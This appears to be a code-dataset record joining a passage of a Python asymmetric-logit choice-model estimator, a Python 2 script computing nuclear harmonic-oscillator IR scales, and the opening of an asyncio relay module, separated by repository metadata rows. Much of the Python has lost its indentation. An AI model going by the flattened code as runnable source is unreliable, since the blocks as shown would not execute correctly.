There should be one row per observation per available alternative and
one column per possible alternative. This matrix maps the rows of the
design matrix to the possible alternatives for this dataset.
eta : 1D ndarray.
Each element should be an int, float, or long. There should be one
value per transformed shape parameter. Note that if there are J
possible alternatives in the dataset, then there should be J - 1
elements in `eta`.
intercept_params : 1D ndarray or None.
If an array, each element should be an int, float, or long. For
        identifiability, there should be J - 1 elements where J is the total
number of observed alternatives for this dataset.
shape_ref_position : int.
Specifies the position in the array of natural shape parameters that
should be equal to 1 - the sum of the other elements. Specifies the
alternative in the ordered array of unique alternatives that is not
having its shape parameter estimated (to ensure identifiability).
intercept_ref_pos : int, or None, optional.
Specifies the index of the alternative, in the ordered array of unique
alternatives, that is not having its intercept parameter estimated (in
order to ensure identifiability). Should only be None if
intercept_params is None. Default == None.
Returns
-------
transformed_utilities : 2D ndarray.
Should have shape `(systematic_utilities.shape[0], 1)`. The returned
array contains the values of the transformed index for this model.
"""
##########
# Convert the reduced shape parameters to the natural shape parameters
##########
natural_shape_params = _convert_eta_to_c(eta, shape_ref_position)
##########
# Calculate the transformed utilities from the natural shape parameters
##########
# Create a vector which contains the appropriate shape for each row in
# the design matrix
long_shapes = rows_to_alts.dot(natural_shape_params)
# Determine the total number of alternatives
num_alts = rows_to_alts.shape[1]
# Get the natural log of the long_shapes
log_long_shapes = np.log(long_shapes)
# Guard against underflow, aka long_shapes too close to zero
log_long_shapes[np.isneginf(log_long_shapes)] = -1 * max_comp_value
# Get the natural log of (1 - long_shapes) / (J - 1)
log_1_sub_long_shapes = np.log((1 - long_shapes) / float(num_alts - 1))
# Guard against underflow, aka 1 - long_shapes too close to zero
small_idx = np.isneginf(log_1_sub_long_shapes)
log_1_sub_long_shapes[small_idx] = -1 * max_comp_value
# Compute the transformed utilities
multiplier = ((systematic_utilities >= 0) * log_long_shapes +
(systematic_utilities < 0) * log_1_sub_long_shapes)
transformed_utilities = log_long_shapes - systematic_utilities * multiplier
# Perform a guard for shape --> 1 and V --> infinity.
# It is DEFINITELY not clear if this is the correct thing to do. The limit
# might not even exist, and there is no clear multivariate L'Hopital's
# rule. So this is an arbitrary decision
weird_case = np.isposinf(systematic_utilities) * (long_shapes == 1)
transformed_utilities[weird_case] = 0
# Account for the outside intercept parameters if there are any
if intercept_params is not None and intercept_ref_pos is not None:
# Get a list of all the indices (or row indices) corresponding to the
# alternatives whose intercept parameters are being estimated.
        needed_idxs = list(range(rows_to_alts.shape[1]))
        needed_idxs.remove(intercept_ref_pos)
if len(intercept_params.shape) > 1 and intercept_params.shape[1] > 1:
# Get an array of zeros with shape
# (num_possible_alternatives, num_parameter_samples)
all_intercepts = np.zeros((rows_to_alts.shape[1],
intercept_params.shape[1]))
# For alternatives having their intercept estimated, replace the
# zeros with the current value of the estimated intercepts
all_intercepts[needed_idxs, :] = intercept_params
else:
# Get an array of zeros with shape (num_possible_alternatives,)
all_intercepts = np.zeros(rows_to_alts.shape[1])
# For alternatives having their intercept estimated, replace the
# zeros with the current value of the estimated intercepts
all_intercepts[needed_idxs] = intercept_params
# Add the intercept values to f(x, beta, c)
transformed_utilities += rows_to_alts.dot(all_intercepts)
# Perform final guards against over/underflow in the transformations
transformed_utilities[np.isposinf(transformed_utilities)] = max_comp_value
transformed_utilities[np.isneginf(transformed_utilities)] = -max_comp_value
# Be sure to return a 2D array since other functions will be expecting that
if len(transformed_utilities.shape) == 1:
transformed_utilities = transformed_utilities[:, np.newaxis]
return transformed_utilities
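# Summary of the transformation implemented above (stated here for readability,
# matching the code): with c_j the natural shape parameter of alternative j, V the
# systematic utility, and J the number of alternatives,
#     h = (1 - V) * ln(c_j)                          when V >= 0
#     h = ln(c_j) - V * ln((1 - c_j) / (J - 1))      when V <  0
# with any outside intercepts added afterwards via rows_to_alts.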
def _asym_transform_deriv_v(systematic_utilities,
alt_IDs,
rows_to_alts,
eta,
ref_position=None,
output_array=None,
*args, **kwargs):
"""
Parameters
----------
systematic_utilities : 1D ndarray.
        Contains the systematic utilities for each available alternative
        for each observation. All elements should be ints, floats, or longs.
    alt_IDs : 1D ndarray.
        All elements should be ints. There should be one row per observation per
available alternative for the given observation. Elements denote the
alternative corresponding to the given row of the design matrix.
rows_to_alts : 2D ndarray.
There should be one row per observation per available alternative and
one column per possible alternative. This matrix maps the rows of the
design matrix to the possible alternatives for this dataset.
eta : 1D ndarray.
Each element should be an int, float, or long. There should be one
value per transformed shape parameter. Note that if there are J
possible alternatives in the dataset, then there should be J - 1
elements in `eta`.
ref_position : int.
Specifies the position in the array of natural shape parameters that
should be equal to 1 - the sum of the other elements. Specifies the
alternative in the ordered array of unique alternatives that is not
having its shape parameter estimated (to ensure identifiability).
output_array : 2D scipy sparse matrix.
This matrix's data is to be replaced with the correct derivatives of
the transformation vector with respect to the vector of systematic
utilities.
Returns
-------
output_array : 2D scipy sparse matrix.
Will be a square matrix with `systematic_utilities.shape[0]` rows and
columns. `output_array` specifies the derivative of the transformed
utilities with respect to the index, V.
"""
##########
# Convert the reduced shape parameters to the natural shape parameters
##########
natural_shape_params = _convert_eta_to_c(eta, ref_position)
##########
# Calculate the derivative of the transformed utilities with respect to
# the systematic utilities
##########
# Create a vector which contains the appropriate shape for each row in the
# design matrix
long_shapes = rows_to_alts.dot(natural_shape_params)
# Determine how many alternatives there are
num_alts = rows_to_alts.shape[1]
# Get the natural log of the long_shapes
log_long_shapes = np.log(long_shapes)
# Guard against underflow, aka long_shapes too close to zero.
# I assume this should never happen because convert_eta_to_c never outputs
# zeros, by design.
log_long_shapes[np.isneginf(log_long_shapes)] = -1 * max_comp_value
# Get the natural log of (1 - long_shapes) / (num_alts - 1)
log_1_sub_long_shapes = np.log((1 - long_shapes) /
(num_alts - 1))
# Guard against underflow, aka 1 - long_shapes too close to zero.
small_idx = np.isneginf(log_1_sub_long_shapes)
log_1_sub_long_shapes[small_idx] = -1 * max_comp_value
# Calculate the derivative of h_ij with respect to v_ij
# Note that the derivative of h_ij with respect to any other systematic
# utility is zero.
derivs = -1 * ((systematic_utilities >= 0).astype(int) *
log_long_shapes +
(systematic_utilities < 0).astype(int) *
log_1_sub_long_shapes)
output_array.data = derivs
# Return the matrix of dh_dv. Note the off-diagonal entries are zero
# because each transformation only depends on its value of v and no others
return output_array
def _asym_transform_deriv_shape(systematic_utilities,
alt_IDs,
rows_to_alts,
eta,
ref_position=None,
dh_dc_array=None,
fill_dc_d_eta=None,
output_array=None,
*args, **kwargs):
"""
Parameters
----------
systematic_utilities : 1D ndarray.
        Contains the systematic utilities for each available alternative
        for each observation. All elements should be ints, floats, or longs.
    alt_IDs : 1D ndarray.
        All elements should be ints. There should be one row per observation per
available alternative for the given observation. Elements denote the
alternative corresponding to the given row of the design matrix.
rows_to_alts : 2D ndarray.
There should be one row per observation per available alternative and
one column per possible alternative. This matrix maps the rows of the
design matrix to the possible alternatives for this dataset.
eta : 1D ndarray.
Each element should be an int, float, or long. There should be one
value per transformed shape parameter. Note that if there are J
possible alternatives in the dataset, then there should be J - 1
elements in `eta`.
ref_position : int.
Specifies the position in the array of natural shape parameters that
should be equal to 1 - the sum of the other elements. Specifies the
alternative in the ordered array of unique alternatives that is not
having its shape parameter estimated (to ensure identifiability).
dh_dc_array : 2D scipy sparse matrix.
Its data is to be replaced with the correct derivatives of the
transformed index vector with respect to the shape parameter vector.
Should have shape
`(systematic_utilities.shape[0], rows_to_alts.shape[1])`.
fill_dc_d_eta : callable.
Should accept `eta` and `ref_position` and return a 2D numpy array
containing the derivatives of the 'natural' shape parameter vector with
respect to the vector of transformed shape parameters.
output_array : 2D numpy matrix.
This matrix's data is to be replaced with the correct derivatives of
the transformed systematic utilities with respect to the vector of
transformed shape parameters. Should have shape
`(systematic_utilities.shape[0], shape_params.shape[0])`.
Returns
-------
output_array : 2D ndarray.
The shape of the returned array will be
`(systematic_utilities.shape[0], shape_params.shape[0])`. The returned
array specifies the derivative of the transformed utilities with
respect to the shape parameters.
"""
##########
# Convert the reduced shape parameters to the natural shape parameters
##########
natural_shape_params = _convert_eta_to_c(eta, ref_position)
##########
# Calculate the derivative of the transformed utilities with respect to
# the vector of natural shape parameters, c
##########
# Create a vector which contains the appropriate shape for each row in the
# design matrix. Note as long as natural_shape_params is a numpy array,
# then long_shapes will be a numpy array.
long_shapes = rows_to_alts.dot(natural_shape_params)
# Calculate d_ln(long_shape)_d_long_shape
d_lnShape_dShape = 1.0 / long_shapes
# Guard against overflow
d_lnShape_dShape[np.isposinf(d_lnShape_dShape)] = max_comp_value
# Calculate d_ln((1-long_shape)/(J-1))_d_long_shape
d_lnShapeComp_dShape = -1.0 / (1 - long_shapes)
# Guard against overflow
d_lnShapeComp_dShape[np.isneginf(d_lnShapeComp_dShape)] = -max_comp_value
# Differentiate the multiplier with respect to natural_shape_j.
deriv_multiplier = ((systematic_utilities >= 0) * d_lnShape_dShape +
(systematic_utilities < 0) * d_lnShapeComp_dShape)
# assert not np.isnan(deriv_multiplier).any()
# Calculate the derivative of h_ij with respect to natural_shape_j.
# Store these derivatives in their respective places in the dh_dc array
# Note that d_hij_d_ck = 0 for k != j
dh_dc_values = d_lnShape_dShape - systematic_utilities * deriv_multiplier
# Guard against overflow
dh_dc_values[np.isinf(dh_dc_values)] = -1 * max_comp_value
# Assign the computed values to the scipy sparse array
dh_dc_array.data = dh_dc_values
##########
# Calculate the derivative of the natural shape parameters, c with
# respect to the vector of reduced shape parameters, eta
##########
# Return the matrix of dh_d_eta. Note the matrix should be of dimension
# (systematic_utilities.shape[0], shape_params.shape[0])
# Note the calculation is essentially dh_dc * dc_d_eta = dh_d_eta
output_array[:, :] = dh_dc_array.dot(fill_dc_d_eta(natural_shape_params,
ref_position))
return output_array
def _asym_transform_deriv_alpha(systematic_utilities,
alt_IDs,
rows_to_alts,
intercept_params,
output_array=None,
*args, **kwargs):
"""
Parameters
----------
systematic_utilities : 1D ndarray.
        Contains the systematic utilities for each available alternative
        for each observation. All elements should be ints, floats, or longs.
    alt_IDs : 1D ndarray.
        All elements should be ints. There should be one row per observation per
available alternative for the given observation. Elements denote the
alternative corresponding to the given row of the design matrix.
rows_to_alts : 2D ndarray.
There should be one row per observation per available alternative and
one column per possible alternative. This matrix maps the rows of the
design matrix to the possible alternatives for this dataset.
intercept_params : 1D ndarray or None.
If an array, each element should be an int, float, or long. For
        identifiability, there should be J - 1 elements where J is the total
number of observed alternatives for this dataset.
output_array : None or 2D scipy sparse matrix.
If `output_array` is a 2D scipy sparse matrix, then it should contain
the derivative of the vector of transformed utilities with respect to
        the intercept parameters outside of the index. This keyword argument
will be returned without alteration.
If there are no intercept parameters outside of the index, then
`output_array` should equal None.
If there are intercept parameters outside of the index, then
`output_array` should be rows_to_alts` without the column corresponding
to the alternative whose intercept is not being estimated in order to
ensure identifiability.
Returns
-------
output_array.
"""
return output_array
def create_calc_dh_dv(estimator):
"""
Return the function that can be used in the various gradient and hessian
calculations to calculate the derivative of the transformation with respect
to the index.
Parameters
----------
estimator : an instance of the estimation.LogitTypeEstimator class.
Should contain a `design` attribute that is a 2D ndarray representing
the design matrix for this model and dataset.
Returns
-------
Callable.
Will accept a 1D array of systematic utility values, a 1D array of
alternative IDs, (shape parameters if there are any) and miscellaneous
args and kwargs. Should return a 2D array whose elements contain the
derivative of the tranformed utility vector with respect to the vector
of systematic utilities. The dimensions of the returned vector should
be `(design.shape[0], design.shape[0])`.
"""
dh_dv = diags(np.ones(estimator.design.shape[0]), 0, format='csr')
# Create a function that will take in the pre-formed matrix, replace its
# data in-place with the new data, and return the correct dh_dv on each
# iteration of the minimizer
calc_dh_dv = partial(_asym_transform_deriv_v,
ref_position=estimator.shape_ref_pos,
output_array=dh_dv)
return calc_dh_dv
def create_calc_dh_d_shape(estimator):
"""
Return the function that can be used in the various gradient and hessian
calculations to calculate the derivative of the transformation with respect
to the shape parameters.
Parameters
----------
estimator : an instance of the estimation.LogitTypeEstimator class.
Should contain a `rows_to_alts` attribute that is a 2D scipy sparse
matrix that maps the rows of the `design` matrix to the alternatives
available in this dataset.
Returns
-------
Callable.
Will accept a 1D array of systematic utility values, a 1D array of
alternative IDs, (shape parameters if there are any) and miscellaneous
args and kwargs. Should return a 2D array whose elements contain the
derivative of the tranformed utility vector with respect to the vector
of shape parameters. The dimensions of the returned vector should
be `(design.shape[0], num_alternatives)`.
"""
num_alts = estimator.rows_to_alts.shape[1]
pre_dc_d_eta = np.zeros((num_alts, num_alts - 1), dtype=float)
pre_dh_dc = estimator.rows_to_alts.copy()
pre_dh_d_eta = np.matrix(np.zeros((estimator.design.shape[0],
num_alts - 1), dtype=float))
easy_calc_dc_d_eta = partial(_calc_deriv_c_with_respect_to_eta,
output_array=pre_dc_d_eta)
# Create a function that will take in the pre-formed matrix, replace its
# data in-place with the new data, and return the correct dh_dshape on each
# iteration of the minimizer
calc_dh_d_eta = partial(_asym_transform_deriv_shape,
ref_position=estimator.shape_ref_pos,
dh_dc_array=pre_dh_dc,
fill_dc_d_eta=easy_calc_dc_d_eta,
output_array=pre_dh_d_eta)
return calc_dh_d_eta
def create_calc_dh_d_alpha(estimator):
"""
Return the function that can be used in the various gradient and hessian
calculations to calculate the derivative of the transformation with respect
to the outside intercept parameters.
Parameters
----------
estimator : an instance of the estimation.LogitTypeEstimator class.
Should contain a `rows_to_alts` attribute that is a 2D scipy sparse
matrix that maps the rows of the `design` matrix to the alternatives
available in this dataset. Should also contain an `intercept_ref_pos`
attribute that is either None or an int. This attribute should denote
which intercept is not being estimated (in the case of outside
intercept parameters) for identification purposes.
Returns
-------
Callable.
Will accept a 1D array of systematic utility values, a 1D array of
alternative IDs, (shape parameters if there are any) and miscellaneous
args and kwargs. Should return a 2D array whose elements contain the
derivative of the tranformed utility vector with respect to the vector
of outside intercepts. The dimensions of the returned vector should
be `(design.shape[0], num_alternatives - 1)`.
"""
if estimator.intercept_ref_pos is not None:
        needed_idxs = list(range(estimator.rows_to_alts.shape[1]))
        needed_idxs.remove(estimator.intercept_ref_pos)
dh_d_alpha = (estimator.rows_to_alts
.copy()
.transpose()[needed_idxs, :]
.transpose())
else:
dh_d_alpha = None
# Create a function that will take in the pre-formed matrix, replace its
# data in-place with the new data, and return the correct dh_dalpha on each
# iteration of the minimizer
calc_dh_d_alpha = partial(_asym_transform_deriv_alpha,
output_array=dh_d_alpha)
return calc_dh_d_alpha
class AsymEstimator(LogitTypeEstimator):
"""
Estimation Object used to enforce uniformity in the estimation process
across the various logit-type models.
Parameters
----------
model_obj : a pylogit.base_multinomial_cm_v2.MNDC_Model instance.
Should contain the following attributes:
- alt_IDs
- choices
- design
- intercept_ref_position
- shape_ref_position
- utility_transform
mapping_res : dict.
Should contain the scipy sparse matrices that map the rows of the long
format dataframe to various other objects such as the available
alternatives, the unique observations, etc. The keys that it must have
are `['rows_to_obs', 'rows_to_alts', 'chosen_row_to_obs']`
ridge : int, float, long, or None.
Determines whether or not ridge regression is performed. If a
scalar is passed, then that scalar determines the ridge penalty for
the optimization. The scalar should be greater than or equal to
        zero.
zero_vector : 1D ndarray.
Determines what is viewed as a "null" set of parameters. It is
explicitly passed because some parameters (e.g. parameters that must be
greater than zero) have their null values at values other than zero.
split_params : callable.
Should take a vector of parameters, `mapping_res['rows_to_alts']`, and
model_obj.design as arguments. Should return a tuple containing
separate arrays for the model's shape, outside intercept, and index
coefficients. For each of these arrays, if this model does not contain
the particular type of parameter, the callable should place a `None` in
its place in the tuple.
constrained_pos : list or None, optional.
Denotes the positions of the array of estimated parameters that are
not to change from their initial values. If a list is passed, the
elements are to be integers where no such integer is greater than
`num_params` Default == None.
weights : 1D ndarray or None, optional.
Allows for the calculation of weighted log-likelihoods. The weights can
represent various things. In stratified samples, the weights may be
the proportion of the observations in a given strata for a sample in
relation to the proportion of observations in that strata in the
population. In latent class models, the weights may be the probability
of being a particular class.
"""
def set_derivatives(self):
self.calc_dh_dv = create_calc_dh_dv(self)
self.calc_dh_d_alpha = create_calc_dh_d_alpha(self)
self.calc_dh_d_shape = create_calc_dh_d_shape(self)
def check_length_of_initial_values(self, init_values):
"""
Ensures that `init_values` is of the correct length. Raises a helpful
ValueError if otherwise.
Parameters
----------
init_values : 1D ndarray.
The initial values to start the optimization process with. There
should be one value for each index coefficient, outside intercept
parameter, and shape parameter being estimated.
Returns
-------
None.
"""
# Calculate the expected number of shape and index parameters
# Note the asymmetric logit model has one shape parameter less than
# the number of alternatives. The same is true of the number of outside
# intercepts.
num_alts = self.rows_to_alts.shape[1]
num_index_coefs = self.design.shape[1]
if self.intercept_ref_pos is not None:
assumed_param_dimensions = num_index_coefs + 2 * (num_alts - 1)
else:
assumed_param_dimensions = num_index_coefs + num_alts - 1
if init_values.shape[0] != assumed_param_dimensions:
            msg_1 = "The initial values are of the wrong dimension. "
            msg_2 = "It should be of dimension {}. "
            msg_3 = "But instead it has dimension {}."
raise ValueError(msg_1 +
msg_2.format(assumed_param_dimensions) +
msg_3.format(init_values.shape[0]))
return None
class MNAL(base_mcm.MNDC_Model):
"""
Parameters
----------
data : string or pandas dataframe.
If string, data should be an absolute or relative path to a CSV file
        containing the long format data for this choice model. Note that long
        format data has one row per available alternative for each observation. If
pandas dataframe, the dataframe should be the long format data for the
choice model.
    alt_id_col : str.
Should denote the column in data which contains the alternative
identifiers for each row.
obs_id_col : str.
Should denote the column in data which contains the observation
identifiers for each row.
choice_col : str.
Should denote the column in data which contains the ones and zeros that
denote whether or not the given row corresponds to the chosen
alternative for the given individual.
specification : OrderedDict.
Keys are a proper subset of the columns in `data`. Values are either a
list or a single string, "all_diff" or "all_same". If a list, the
elements should be:
- single objects that are in the alternative ID column of `data`
- lists of objects that are within the alternative ID column of
`data`. For each single object in the list, a unique column will
be created (i.e. there will be a unique coefficient for that
variable in the corresponding utility equation of the
corresponding alternative). For lists within the
`specification` values, a single column will be created for all
the alternatives within the iterable (i.e. there will be one
common coefficient for the variables in the iterable).
intercept_ref_pos : int, optional.
Valid only when the intercepts being estimated are not part of the
index. Specifies the alternative in the ordered array of unique
alternative ids whose intercept or alternative-specific constant is
not estimated, to ensure model identifiability. Default == None.
shape_ref_pos : int, optional.
Specifies the alternative in the ordered array of unique alternative
ids whose shape parameter is not estimated, to ensure model
identifiability. Implemented as an optional parameter but MUST be
passed for this model.
names : OrderedDict, optional.
Should have the same keys as `specification`. For each key:
- if the corresponding value in `specification` is "all_same", then
there should be a single string as the value in names.
- if the corresponding value in `specification` is "all_diff", then
there should be a list of strings as the value in names. There
should be one string in the value in names for each possible
alternative.
- if the corresponding value in `specification` is a list, then
there should be a list of strings as the value in names. There
              should be one string in the value in names per item in the value in
`specification`.
Default == None.
intercept_names : list, or None, optional.
If a list is passed, then the list should have the same number of
elements as there are possible alternatives in data, minus 1. Each
element of the list should be a string--the name of the corresponding
alternative's intercept term, in sorted order of the possible
alternative IDs. If None is passed, the resulting names that are shown
in the estimation results will be
`["Outside_ASC_{}".format(x) for x in shape_names]`. Default = None.
shape_names : list, or None, optional.
If a list is passed, then the list should have the same number of
elements as there are possible alternative IDs in data. Each element of
the list should be a string denoting the name of the corresponding
shape parameter for the given alternative, in sorted order of the
possible alternative IDs. The resulting names which are shown in the
estimation results will be ["shape_{}".format(x) for x in shape_names].
Default == None.
"""
def __init__(self,
data,
alt_id_col,
obs_id_col,
choice_col,
specification,
intercept_ref_pos=None,
shape_ref_pos=None,
names=None,
intercept_names=None,
shape_names=None,
**kwargs):
##########
# Check that shape_ref_pos has been passed.
##########
try:
assert isinstance(shape_ref_pos, int)
except AssertionError:
raise ValueError(_shape_ref_msg)
# Carry out the common instantiation process for all choice models
super(MNAL, self).__init__(data,
alt_id_col,
obs_id_col,
choice_col,
specification,
intercept_ref_pos=intercept_ref_pos,
shape_ref_pos=shape_ref_pos,
names=names,
intercept_names=intercept_names,
shape_names=shape_names,
model_type=display_name_dict["Asym"])
# Store the utility transform function
self.utility_transform = partial(_asym_utility_transform,
shape_ref_position=shape_ref_pos,
intercept_ref_pos=intercept_ref_pos)
return None
def fit_mle(self, init_vals,
init_shapes=None,
init_intercepts=None,
init_coefs=None,
print_res=True,
method="BFGS",
loss_tol=1e-06,
gradient_tol=1e-06,
maxiter=1000,
ridge=None,
constrained_pos=None,
just_point=False,
**kwargs):
"""
Parameters
----------
init_vals : 1D ndarray.
The initial values to start the optimization process with. There
should be one value for each index coefficient and shape
parameter being estimated. Shape parameters should come before
intercept parameters, which should come before index coefficients.
One can also pass None, and instead pass `init_shapes`, optionally
`init_intercepts` if `"intercept"` is not in the utility
specification, and `init_coefs`.
init_shapes : 1D ndarray or None, optional.
The initial values of the shape parameters. All elements should be
ints, floats, or longs. There should be one element less than the
total number of possible alternatives in the dataset. This keyword
argument will be ignored if `init_vals` is not None.
Default == None.
init_intercepts : 1D ndarray or None, optional.
The initial values of the intercept parameters. There should be one
parameter per possible alternative id in the dataset, minus one.
The passed values for this argument will be ignored if `init_vals`
is not None. This keyword argument should only be used if
`"intercept"` is not in the utility specification. Default == None.
init_coefs : 1D ndarray or None, optional.
The initial values of the index coefficients. There should be one
coefficient per index variable. The passed values for this argument
will be ignored if `init_vals` is not None. Default == None.
print_res : bool, optional.
Determines whether the timing and initial and final log likelihood
            results will be printed as they are determined.
Default `== True`.
method : str, optional.
Should be a valid string for scipy.optimize.minimize. Determines
the optimization algorithm that is used for this problem.
            Default `== 'BFGS'`.
loss_tol : float, optional.
Determines the tolerance on the difference in objective function
values from one iteration to the next that is needed to determine
convergence. Default `== 1e-06`.
gradient_tol : float, optional.
Determines the tolerance on the difference in gradient values from
one iteration to the next which is needed to determine convergence.
Default `== 1e-06`.
maxiter : int, optional.
Determines the maximum number of iterations used by the optimizer.
Default `== 1000`.
ridge : int, float, long, or None, optional.
Determines whether or not ridge regression is performed. If a
scalar is passed, then that scalar determines the ridge penalty for
the optimization. The scalar should be greater than or equal to
zero. Default `== None`.
constrained_pos : list or None, optional.
Denotes the positions of the array of estimated parameters that are
not to change from their initial values. If a list is passed, the
elements are to be integers where no such integer is greater than
            `init_vals.size`. Default == None.
        just_point : bool, optional.
            Determines whether the calculations that are non-critical for
            obtaining the maximum likelihood point estimate are skipped (True)
            or performed (False). If True, this function will return the
            results dictionary from scipy.optimize. Default == False.
        Returns
        -------
        None if `just_point == False`; the estimation results are then saved
        to the model instance. Otherwise, the results dictionary from
        scipy.optimize is returned.
"""
# Store the optimization method
self.optimization_method = method
# Store the ridge parameter
self.ridge_param = ridge
if ridge is not None:
warnings.warn(_ridge_warning_msg)
# Construct the mappings from alternatives to observations and from
# chosen alternatives to observations
mapping_res = self.get_mappings_for_fit()
rows_to_alts = mapping_res["rows_to_alts"]
# Create init_vals from init_coefs, init_intercepts, and init_shapes if
# those arguments are passed to the function and init_vals is None.
if init_vals is None and all([x is not None for x in [init_shapes,
init_coefs]]):
##########
# Check the integrity of the parameter kwargs
##########
num_alternatives = rows_to_alts.shape[1]
try:
assert init_shapes.shape[0] == num_alternatives - 1
except AssertionError:
msg = "init_shapes is of length {} but should be of length {}"
raise ValueError(msg.format(init_shapes.shape,
num_alternatives - 1))
try:
assert init_coefs.shape[0] == self.design.shape[1]
except AssertionError:
msg = "init_coefs has length {} but should have length {}"
raise ValueError(msg.format(init_coefs.shape,
self.design.shape[1]))
try:
if init_intercepts is not None:
assert init_intercepts.shape[0] == (num_alternatives - 1)
except AssertionError:
msg = "init_intercepts has length {} but should have length {}"
raise ValueError(msg.format(init_intercepts.shape,
num_alternatives - 1))
# The code block below will limit users to only having 'inside'
# OR 'outside' intercept parameters but not both.
# try:
# condition_1 = "intercept" not in self.specification
# condition_2 = init_intercepts is None
# assert condition_1 or condition_2
# except AssertionError as e:
# msg = "init_intercepts should only be used if 'intercept' is"
# msg_2 = " not in one's index specification."
# msg_3 = "Either make init_intercepts = None or remove "
# msg_4 = "'intercept' from the specification."
# print(msg + msg_2)
# print(msg_3 + msg_4)
# raise e
if init_intercepts is not None:
init_vals = np.concatenate((init_shapes,
init_intercepts,
init_coefs), axis=0)
else:
init_vals = np.concatenate((init_shapes,
init_coefs), axis=0)
elif init_vals is None:
msg = "If init_vals is None, then users must pass both init_coefs "
msg_2 = "and init_shapes."
raise ValueError(msg + msg_2)
# Create the estimation object
zero_vector = np.zeros(init_vals.shape)
asym_estimator = AsymEstimator(self,
mapping_res,
ridge,
zero_vector,
split_param_vec,
constrained_pos=constrained_pos)
# Set the derivative functions for estimation
asym_estimator.set_derivatives()
# Perform one final check on the length of the initial values
asym_estimator.check_length_of_initial_values(init_vals)
# Get the estimation results
estimation_res = estimate(init_vals,
asym_estimator,
method,
loss_tol,
gradient_tol,
maxiter,
print_res,
just_point=just_point)
if not just_point:
# Store the estimation results
self.store_fit_results(estimation_res)
return None
else:
return estimation_res
|
bsd-3-clause
| -4,480,891,505,624,783,400 | 44.983621 | 79 | 0.627968 | false |
KyleWendt/ncsm_ho_ir_scale
|
ncsm_ho_ir_scale.py
|
1
|
3840
|
#!/usr/bin/env python
'''
author: Kyle Wendt <[email protected]>
copyright: 2015 Kyle Wendt
License: GPL v3
'''
def main():
import argparse, textwrap
from numpy import arange, array, sqrt
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=textwrap.dedent('''\
Example:
For odd parity Lithium-7 states, Ltot = 3, N = 4, and Z = 3, with Nmax upto 40
python ncsm_ho_ir_scale.py -N 40 3 4 3'''))
    parser.add_argument('Ltot', metavar='Ltot', type=int, help='Sum of orbital angular momenta for the "lowest" HO state; parity will be determined by the parity of Ltot (Pi = (-1)^Ltot)')
parser.add_argument('N', metavar='N', type=int, help='number of neutrons')
parser.add_argument('Z', metavar='Z', type=int, help='number of protons')
parser.add_argument('-N', '--ntot', type=int, dest='Ntot', help='Largest Ntot to output (default 40)', default=40)
args = parser.parse_args()
N, Z, l_total = args.N, args.Z, args.Ltot
par = 1 if l_total & 1 else 0
Pi = -1 if l_total & 1 else 1
A = N + Z
n_tot = min(40, abs(args.Ntot))
d_tot = 3 * A
d_int = 3 * (A - 1)
two_l_tot = 2 * l_total + (d_tot - 3)
two_l_int = 2 * l_total + (d_int - 3)
k2_all = compute_k2_vals((two_l_tot + 1) // 2, 1)
k2_tot = k2_all[two_l_tot]
k2_int = k2_all[two_l_int]
n_tot_min = l_total + ((l_total ^ par) & 1)
n_all = arange(l_total + ((l_total ^ par) & 1), n_tot + 1, 2)
ho_k2_tot = array([HH_HO_eigvals(n, l_total, d_tot)[0] for n in n_all])
ho_k2_int = array([HH_HO_eigvals(n, l_total, d_int)[0] for n in n_all])
nt_tot = sqrt(k2_tot / ho_k2_tot)
nt_int = sqrt(k2_int / ho_k2_int)
print_header(N, Z, Pi, l_total)
for N, Kt, Ki in zip(n_all, nt_tot, nt_int):
print r" {:4} {:16.8f} {:16.8f}".format(N, Kt, Ki)
# K2 = Kzeros[2 * Ltot + 3 * A]
def print_header(n, z, pi, l):
print r"# L_{\rm eff} = b * \tilde{N}"
print r"# \Lambda_{\rm eff} = b^{-1} * \tilde{N}"
print r"# N: {:d} Z: {:d} Pi: {:+d} L total: {:d}".format(n, z, pi, l)
print "# {:>4s} {:>16s} {:>16s}".format("Ntot", r"\tilde{N}", r"\tilde{N}_{int}")
def compute_k2_vals(l_max, num_vals):
"""
    Compute hyper-radial infinite-well K^2 eigenvalues for a well of unit radial width, i.e. the eigenvalues for a well
    with parameter L = G + 3 D / 2.
    Compute the square of the zeros of J_{l+1/2}(x) for l = 0, 1/2, 1, ..., floor(l_max), floor(l_max)+1/2
:param l_max: Max l to find zeros of
:param num_vals: Total number of zeros to find for each l
    :return K2: A 2*l_max + 1 by num_vals ndarray containing the computed squared zeros. K2[2*L + D - 3] holds the
    eigenvalues for dimension D and hyper angular momentum L
"""
from numpy import arange, pi, zeros, zeros_like
from scipy.optimize import brentq
from scipy.special import jv
zro = zeros((2 * l_max + 1, num_vals), dtype=float)
z_l_m_1 = pi * arange(1,num_vals + l_max + 1)
z_l = zeros_like(z_l_m_1)
zz_l = zeros_like(z_l_m_1)
zro[0] = z_l_m_1[:num_vals]
for l in range(1, l_max + 1):
for i in range(num_vals + l_max - l):
zz_l[i] = brentq(lambda x: jv(l, x), z_l_m_1[i], z_l_m_1[i + 1])
z_l[i] = brentq(lambda x: jv(l + .5, x), z_l_m_1[i], z_l_m_1[i + 1])
z_l_m_1[:] = z_l[:]
zro[2 * l] = z_l[:num_vals]
zro[2 * l - 1] = zz_l[:num_vals]
if num_vals == 1:
zro = zro[:,0]
return zro**2
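# Added sanity-check sketch (illustrative, not part of the original script):
# the first zero of J_{1/2}(x) is pi, so the lowest squared zero returned for
# the l = 0 row (Bessel order 1/2) should equal pi**2.
#
#     from numpy import pi
#     k2 = compute_k2_vals(1, 1)        # rows for orders 1/2, 1, 3/2
#     assert abs(k2[0] - pi**2) < 1e-8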
def HH_HO_eigvals(NMax, K, D):
from numpy import arange, sqrt, vstack
from scipy.linalg import eigvals_banded
nmax = (NMax-K) // 2
n = arange(nmax+1)
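    # The banded form below (lower=True) stores the diagonal 2n + K + D/2 in
    # its first row and the sub-diagonal couplings sqrt((n + 1)(n + K + D/2))
    # in its second row.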
return eigvals_banded(vstack((2 * n + K + D / 2., sqrt((n + 1) * (n + K + D / 2.)))), lower=True)
if __name__ == '__main__':
main()
|
gpl-3.0
| -2,794,175,279,695,916,500 | 35.226415 | 174 | 0.565625 | false |
twisteroidambassador/pluggabletransportadapter
|
ptadapter/relays.py
|
1
|
1740
|
import asyncio
from . import contexts
from . import log
BUF_SIZE = 2**13
_logger = log.pkg_logger.getChild('relay')
async def _relay_data_side(
reader: asyncio.StreamReader,
writer: asyncio.StreamWriter,
) -> None:
"""Pass data and EOF from reader to writer."""
while True:
buf = await reader.read(BUF_SIZE)
if not buf: # EOF
break
writer.write(buf)
